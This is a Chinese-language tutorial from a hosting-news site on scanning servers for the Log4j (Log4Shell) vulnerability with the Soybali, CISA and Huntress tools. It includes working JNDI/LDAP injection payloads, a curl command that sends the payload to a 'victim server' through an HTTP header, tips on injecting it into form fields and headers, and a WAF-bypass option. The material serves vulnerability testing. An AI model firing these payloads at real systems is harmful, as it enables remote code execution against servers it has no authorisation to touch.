最新消息:本站介绍:国外VPS、云服务器,海外服务器,一手资源推荐平台

如何扫描您的服务器以查找 Log4j (Log4Shell) 漏洞

网络安全 快米云 来源:快米云 50浏览

如何扫描您的服务器以查找 Log4j (Log4Shell) 漏洞

Log4j 是一个广泛使用的软件库,用于记录安全性和性能信息。安全专家在流行的库中发现了一个零日漏洞,影响了许多企业 IT 系统。几家供应商已经发布了不同的工具,但很快就发现了第二个漏洞。之后,Apache 软件基金会推出了一个新的修复程序。如果您的系统有任何 Java 应用程序使用 2.14.1 之前的 Log4j 版本,您应该迅速采取行动。您可以使用以下工具快速扫描您的系统以检查 Log4j 漏洞。

提示:您可以在此处关注受 Log4j 漏洞影响的应用程序或系统的更新列表和解决方案。(名单不断更新)

Apache Log4j CVE-2021-44228 扫描程序

扫描您的系统以检查 Apache Log4j 漏洞非常容易。您所要做的就是执行开源工具:由 Seccops Cyber​​ Security Technologies Inc. 的安全研究员 Adil Soybali 开发的 Apache Log4j CVE-2021-44228。

特征

  • 根据您提供的 URL 列表进行扫描。
  • 通过查找提供的域名的子域进行扫描。
  • 添加源域作为前缀以确定传入的 DNS 查询来自哪个源。

要求

安装

git clone https://github.com/adilsoybali/Log4j-RCE-Scanner.git
cd Log4j-RCE-Scanner
chmod +x log4j-rce-scanner.sh

用法

./log4j-rce-scanner.sh -h

这将显示该工具的帮助。这是它支持的所有开关。

-h, --help - Display help
-l, --url-list - List of domain/subdomain/ip to be used for scanning.
-d, --domain - The domain name to which all subdomains and itself will be checked.
-b, --burpcollabid - Burp collabrator client id address or interactsh domain address.

Example uses:
./log4j-rce-scanner.sh -l httpxsubdomains.txt -b yrt45r4sjyoj19617jem5briio3cs.burpcollaborator.net
./log4j-rce-scanner.sh -d adilsoybali.com -b yrt45r4sjyoj19617jem5briio3cs.burpcollaborator.net
如果该域易受攻击,则会将带有易受攻击域名的 DNS 回调发送到您提供的 burp 协作者或 interactsh 地址。
Log4j Log4shell 扫描仪设置
Log4j Log4shell 扫描仪设置

官方 GitHub 存储库


CISA Log4j 扫描仪

https://github.com/cisagov/log4j-scanner

此存储库为 log4j 远程代码执行漏洞(CVE-2021-44228 和 CVE-2021-45046)提供扫描解决方案。此存储库中的信息和代码“按原样”提供,并在开源社区的帮助下组装,并由 CISA 通过与更广泛的网络安全社区合作进行更新。这并不是一个 100% 真正肯定的解决方案;可能会出现假阴性。

cisa log4j 扫描仪

用法

扫描单个 URL

$ python3 log4j-scan.py -u https://log4j.lab.secbot.local

使用所有请求方法扫描单个 URL:GET、POST(url 编码形式)、POST(JSON 正文)

$ python3 log4j-scan.py -u https://log4j.lab.secbot.local --run-all-tests

发现环境中的 WAF 绕过。

$ python3 log4j-scan.py -u https://log4j.lab.secbot.local --waf-bypass

扫描 URL 列表

$ python3 log4j-scan.py -l urls.txt

Huntress Labs log4shell 测试仪

https://log4shell.huntress.com

此测试器提供具有唯一标识符的有效负载,并接受来自易受攻击的应用程序的 LDAP 连接,并显示 IP 地址接收连接。底部提到的示例代码(有效负载)也可用于测试这一点。

用法

您只需将生成的 JNDI 语法(有效负载)(下面显示的代码块) 复制并粘贴到任何内容中(应用程序输入框、前端站点表单字段、诸如用户名输入之类的登录名,或者如果您更懂技术,甚至是 User-Agent或 X-Forwarded-For 或其他可自定义的HTTP标头)。  ${jndi[:]ldap[:]//....

示例代码(有效负载):

${jndi:ldap://log4shell.huntress.com:1389/(your_random_huntress_url}

如何将 Log4j 有效负载发送到受害者服务器?

  1. 您可以使用 Web 浏览器上的用户代理切换器扩展将有效负载发送到受害者服务器。
  2. 您还可以通过Linux终端向受害者服务器发送 curl 请求。
curl http://vulnerable-app:8080 \ -H 'X-Api-Version: ${jndi:ldap://log4shell.huntress.com:1389/(your_random_huntress_url}'


趋势科技 Log4j 漏洞测试器

转载请注明:VPS资讯_海外云服务器资讯_海外服务器资讯_IDC新闻 » 如何扫描您的服务器以查找 Log4j (Log4Shell) 漏洞